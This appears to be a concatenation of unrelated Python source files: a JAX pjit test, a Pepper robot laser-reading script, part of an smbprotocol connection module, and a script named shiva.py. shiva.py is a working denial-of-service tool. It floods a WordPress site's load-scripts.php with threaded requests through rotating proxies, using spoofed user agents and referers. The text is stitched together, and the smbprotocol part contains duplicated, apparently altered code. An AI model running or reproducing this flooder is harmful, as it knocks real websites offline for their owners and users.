in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
"pjit in_axis_resources specification must be a tree prefix of the "
"positional arguments tuple passed to the `pjit`-decorated function. "
"In particular, pjit in_axis_resources must either be a None, a "
"PartitionSpec, or a tuple of length equal to the number of positional "
"arguments. But pjit in_axis_resources is the wrong length: got a "
"tuple or list of length 3 for an args tuple of length 2.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x)
Foo = namedtuple('Foo', ['x'])
error = "in_axis_resources is not a tuple.*might need to be wrapped"
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, Foo(None), Foo(None))(Foo(x))
pjit(lambda x: x, (Foo(None),), Foo(None))(Foo(x)) # OK w/ singleton tuple
# TODO(apaszke,mattjj): Disable implicit list casts and enable this
# error = ("it looks like pjit in_axis_resources might need to be wrapped in "
# "a singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x, y: x, p, p)([x, x, x])
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
"pytree structure error: different numbers of pytree children at "
"key path\n"
" pjit out_axis_resources tree root\n"
"At that key path, the prefix pytree pjit out_axis_resources has a "
"subtree of type\n"
" <class 'list'>\n"
"with 2 children, but at the same key path the full pytree has a "
"subtree of the same type but with 3 children.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with maps.Mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = self.rng()
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.randint(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
@parameterized.named_parameters(
("linear", {'x': 0, 'y': 1, 'z': 2}, P(('x',), ('y',), ('z',))),
("combine", {'x': 0, 'y': 0, 'z': 1}, P(('x', 'y'), ('z',))),
("skip", {'x': 0, 'y': 0, 'z': 2}, P(('x', 'y'), None, ('z',))),
("multi_skip", {'x': 0, 'y': 1, 'z': 3}, P(('x',), ('y',), None, ('z',))),
)
def test_array_mapping_to_axis_resources(self, inp, expected_out):
self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)
def test_get_input_metadata_fully_replicated(self):
global_mesh = jtu.create_global_mesh((2, 2), ('x', 'y'))
global_in_aval1 = jax.core.ShapedArray((4, 4), jnp.int32)
global_in_aval2 = jax.core.ShapedArray((4, 4, 4), jnp.int32)
global_in_aval3 = jax.core.ShapedArray((), jnp.int32)
in_avals = [global_in_aval1, global_in_aval2, global_in_aval3]
_, out_indices, _ = pxla._get_input_metadata(
in_avals, global_mesh, [{}, {}, {}], [False, False, False])
self.assertLen(out_indices, len(in_avals))
self.assertTrue(all(len(out) == len(global_mesh.local_devices)
for out in out_indices))
self.assertTrue(all(len(i) == aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
self.assertTrue(all(i == (slice(None),) * aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
shiva.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import requests
import proxify
import random
import argparse
import sys
requests.packages.urllib3.disable_warnings()
# Just some colors and shit
white = '\x1b[1;97m'
green = '\x1b[1;32m'
red = '\x1b[1;31m'
red = '\x1b[31m'
yellow = '\x1b[1;33m'
end = '\x1b[1;m'
info = '\x1b[1;33m[!]\x1b[1;m'
que = '\x1b[1;34m[?]\x1b[1;m'
bad = '\x1b[1;31m[-]\x1b[1;m'
good = '\x1b[1;32m[+]\x1b[1;m'
run = '\x1b[1;97m[~]\x1b[1;m'
parser = argparse.ArgumentParser()
parser.add_argument("-u", help="target website", dest='target')
parser.add_argument("-t", help="number of threads", dest='n', type=int)
args = parser.parse_args()
print ('''
%s██████ ██░ ██ ██▓ ██▒ █▓ ▄▄▄
▒██ ▒ ▓██░ ██▒▓██▒▓██░ █▒▒████▄
░ ▓██▄ ▒██▀▀██░▒██▒ ▓██ █▒░▒██ ▀█▄
▒ ██▒░▓█ ░██ ░██░ ▒██ █░░░██▄▄▄▄██
▒██████▒▒░▓█▒░██▓░██░ ▒▀█░ ▓█ ▓██▒
▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░▓ ░ ▐░ ▒▒ ▓▒█░
░ ░▒ ░ ░ ▒ ░▒░ ░ ▒ ░ ░ ░░ ▒ ▒▒ ░
░ ░ ░ ░ ░░ ░ ▒ ░ ░░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░
░ %s''' % (red, end))
if not args.target or not args.n:
parser.print_help()
quit()
if 'http' not in args.target:
target = 'http://' + args.target
else:
target = args.target
n = args.n
user_agents = ['Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991',
'Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30',
'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (PLAYSTATION 3 4.81) AppleWebKit/531.22.8 (KHTML, like Gecko)',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.52',
'Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42',
'Mozilla/5.0 (Windows NT 6.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.2.7 (KHTML, like Gecko)',
'Mozilla/5.0 (PlayStation 4 5.01) AppleWebKit/601.2 (KHTML, like Gecko)',]
path = '''/wp-admin/load-scripts.php?c=1&load[]=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,
wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,
scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,
jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,
jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,
jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,
jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,
jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,
jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,
masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,
json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,
wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,
password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,
customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,
customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,
media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,
admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,
theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,
nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9.1'''
referers = ['http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'http://www.google.com/?q=', 'http://engadget.search.aol.com/search?q=',
'http://www.bing.com/search?q=', 'http://search.yahoo.com/search?p=', 'http://www.ask.com/web?q=', 'http://boorow.com/Pages/site_br_aspx?query=',
'http://search.lycos.com/web/?q=', 'http://busca.uol.com.br/web/?q=', 'http://us.yhs4.search.yahoo.com/yhs/search?p=',
'http://www.dmoz.org/search/search?q=', 'http://www.baidu.com.br/s?usm=1&rn=100&wd=', 'http://yandex.ru/yandsearch?text=', 'http://www.zhongsou.com/third?w=',
'http://hksearch.timway.com/search.php?query=', 'http://find.ezilon.com/search.php?q=', 'http://www.sogou.com/web?query=', 'http://api.duckduckgo.com/html/?q=']
progress = []
turns = 0
proxies = proxify.many()
def attack():
global proxies, turns
for x in range(1, 9999):
try:
proxy_o = random.choice(proxies)
if 'https' in proxy_o:
proxy = {'https': proxy_o}
else:
proxy = {'http': proxy_o}
headers = {'User-Agent': random.choice(user_agents), 'Connection': 'keep-alive',
'Keep-Alive': str(random.choice(range(110,120))), 'Referer': random.choice(referers)}
requests.get(target + path, verify=False, stream=True, proxies=proxy).text
sys.stdout.write('\r%s Requests sent: %i' % (run, len(progress)))
sys.stdout.flush()
progress.append(0)
turns = turns + 1
if turns > n:
turns = turns - n
del proxies[:]
proxies = proxify.many()
except:
pass
threads = []
for i in range(1, n):
task = threading.Thread(target=attack, args=())
threads.append(task)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
getlaser.py | #http://doc.aldebaran.com/2-5/naoqi/core/almemory-api.html
#http://doc.aldebaran.com/2-5/family/pepper_technical/pepper_dcm/actuator_sensor_names.html#ju-lasers
import qi
import argparse
import sys
import time
import threading
import os
laserValueList = [
# RIGHT LASER
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg01/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg01/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg02/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg02/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg03/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg03/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg04/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg04/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg05/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg05/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg06/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg06/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg07/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg07/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg08/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg08/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg09/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg09/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg10/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg10/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg11/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg11/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg12/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg12/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg13/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg13/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg14/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg14/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg15/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg15/Y/Sensor/Value",
# FRONT LASER
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg01/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg01/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg02/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg02/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg03/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg03/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg04/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg04/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg05/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg05/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg06/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg06/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg07/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg07/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg08/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg08/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg09/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg09/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg10/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg10/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg11/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg11/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg12/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg12/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg13/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg13/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg14/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg14/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg15/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg15/Y/Sensor/Value",
# LEFT LASER
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg01/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg01/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg02/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg02/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg03/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg03/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg04/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg04/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg05/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg05/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg06/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg06/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg07/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg07/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg08/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg08/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg09/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg09/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg10/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg10/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg11/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg11/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg12/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg12/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg13/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg13/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg14/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg14/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg15/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg15/Y/Sensor/Value"
]
import threading
def rhMonitorThread (memory_service):
t = threading.currentThread()
while getattr(t, "do_run", True):
laserValues = memory_service.getListData(laserValueList)
print laserValues[44],laserValues[45]
time.sleep(0.1)
print "Exiting Thread"
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
parser.add_argument("--pport", type=int, default=9559,
help="Naoqi port number")
args = parser.parse_args()
pip = args.pip
pport = args.pport
#Starting application
try:
connection_url = "tcp://" + pip + ":" + str(pport)
app = qi.Application(["laserReader", "--qi-url=" + connection_url ])
except RuntimeError:
print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
"Please check your script arguments. Run with -h option for help.")
sys.exit(1)
app.start()
session = app.session
#Starting services
memory_service = session.service("ALMemory")
#create a thead that monitors directly the signal
monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
monitorThread.start()
#Program stays at this point until we stop it
app.run()
monitorThread.do_run = False
print "Finished"
if __name__ == "__main__":
main()
|
connection.py | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
from __future__ import division
global g_count
g_count = 0
import binascii
import hashlib
import hmac
import logging
import math
import os
import struct
import time
import threading
import smbprotocol.lznt1
from collections import (
OrderedDict,
)
from cryptography.exceptions import (
UnsupportedAlgorithm,
)
from cryptography.hazmat.backends import (
default_backend,
)
from cryptography.hazmat.primitives import (
cmac,
)
from cryptography.hazmat.primitives.ciphers import (
aead,
algorithms,
)
from datetime import (
datetime,
)
from threading import (
Lock,
)
from smbprotocol import (
Commands,
Dialects,
MAX_PAYLOAD_SIZE,
)
from smbprotocol._text import (
to_native,
to_text,
)
from smbprotocol.exceptions import (
NtStatus,
SMB2SymbolicLinkErrorResponse,
SMBException,
SMBResponseException,
)
from smbprotocol.open import (
Open,
)
from smbprotocol.structure import (
BytesField,
DateTimeField,
EnumField,
FlagField,
IntField,
ListField,
Structure,
StructureField,
UuidField,
)
from smbprotocol.transport import (
Tcp,
)
try:
from queue import Queue
except ImportError: # pragma: no cover
from Queue import Queue
log = logging.getLogger(__name__)
class Smb2Flags(object):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.1.2 SMB2 Packet Header - SYNC Flags
Indicates various processing rules that need to be done on the SMB2 packet.
"""
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SMB2_FLAGS_ASYNC_COMMAND = 0x00000002
SMB2_FLAGS_RELATED_OPERATIONS = 0x00000004
SMB2_FLAGS_SIGNED = 0x00000008
SMB2_FLAGS_PRIORITY_MASK = 0x00000070
SMB2_FLAGS_DFS_OPERATIONS = 0x10000000
SMB2_FLAGS_REPLAY_OPERATIONS = 0x20000000
class SecurityMode(object):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3 SMB2 NEGOTIATE Request SecurityMode
Indicates whether SMB signing is enabled or required by the client.
"""
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
class Capabilities(object):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3 SMB2 NEGOTIATE Request Capabilities
Used in SMB3.x and above, used to specify the capabilities supported.
"""
SMB2_GLOBAL_CAP_DFS = 0x00000001
SMB2_GLOBAL_CAP_LEASING = 0x00000002
SMB2_GLOBAL_CAP_LARGE_MTU = 0x00000004
SMB2_GLOBAL_CAP_MULTI_CHANNEL = 0x00000008
SMB2_GLOBAL_CAP_PERSISTENT_HANDLES = 0x00000010
SMB2_GLOBAL_CAP_DIRECTORY_LEASING = 0x00000020
SMB2_GLOBAL_CAP_ENCRYPTION = 0x00000040
class NegotiateContextType(object):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3.1 SMB2 NEGOTIATE_CONTENT Request ContextType
Specifies the type of context in an SMB2 NEGOTIATE_CONTEXT message.
"""
SMB2_PREAUTH_INTEGRITY_CAPABILITIES = 0x0001
SMB2_ENCRYPTION_CAPABILITIES = 0x0002
SMB2_COMPRESSION_CAPABILITIES = 0x0003
class HashAlgorithms(object):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3.1.1 SMB2_PREAUTH_INTEGRITY_CAPABILITIES
16-bit integer IDs that specify the integrity hash algorithm supported
"""
SHA_512 = 0x0001
@staticmethod
def get_algorithm(hash):
return {
HashAlgorithms.SHA_512: hashlib.sha512
}[hash]
class Ciphers(object):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3.1.2 SMB2_ENCRYPTION_CAPABILITIES
16-bit integer IDs that specify the supported encryption algorithms.
"""
AES_128_CCM = 0x0001
AES_128_GCM = 0x0002
@staticmethod
def get_cipher(cipher):
return {
Ciphers.AES_128_CCM: aead.AESCCM,
Ciphers.AES_128_GCM: aead.AESGCM
}[cipher]
@staticmethod
def get_supported_ciphers():
supported_ciphers = []
try:
aead.AESGCM(b"\x00" * 16)
supported_ciphers.append(Ciphers.AES_128_GCM)
except UnsupportedAlgorithm: # pragma: no cover
pass
try:
aead.AESCCM(b"\x00" * 16)
supported_ciphers.append(Ciphers.AES_128_CCM)
except UnsupportedAlgorithm: # pragma: no cover
pass
return supported_ciphers
class CompressionAlgos(object):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3.1.2 SMB2_ENCRYPTION_CAPABILITIES
16-bit integer IDs that specify the supported encryption algorithms.
"""
NONE = 0x0000
LZNT1 = 0x0001
LZ77 = 0x0002
LZ77HUFFMAN = 0x0003
@staticmethod
def get_cipher(cipher):
return {
Ciphers.AES_128_CCM: aead.AESCCM,
Ciphers.AES_128_GCM: aead.AESGCM
}[cipher]
@staticmethod
def get_supported_ciphers():
supported_ciphers = []
supported_ciphers.append(CompressionAlgos.NONE)
supported_ciphers.append(CompressionAlgos.LZNT1)
supported_ciphers.append(CompressionAlgos.LZ77)
supported_ciphers.append(CompressionAlgos.LZ77HUFFMAN)
return supported_ciphers
class SMB2HeaderAsync(Structure):
"""
[MS-SMB2] 2.2.1.1 SMB2 Packer Header - ASYNC
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/ea4560b7-90da-4803-82b5-344754b92a79
The SMB2 Packet header for async commands.
"""
def __init__(self):
self.fields = OrderedDict([
('protocol_id', BytesField(
size=4,
default=b"\xfeSMB",
)),
('structure_size', IntField(
size=2,
default=64,
)),
('credit_charge', IntField(size=2)),
('channel_sequence', IntField(size=2)),
('reserved', IntField(size=2)),
('command', EnumField(
size=2,
enum_type=Commands,
)),
('credit_request', IntField(size=2)),
('flags', FlagField(
size=4,
flag_type=Smb2Flags,
)),
('next_command', IntField(size=4)),
('message_id', IntField(size=8)),
('async_id', IntField(size=8)),
('session_id', IntField(size=8)),
('signature', BytesField(
size=16,
default=b"\x00" * 16,
)),
('data', BytesField())
])
super(SMB2HeaderAsync, self).__init__()
class SMB2HeaderRequest(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.1.2 SMB2 Packet Header - SYNC
This is the header definition that contains the ChannelSequence/Reserved
instead of the Status field used for a Packet request.
"""
def __init__(self):
self.fields = OrderedDict([
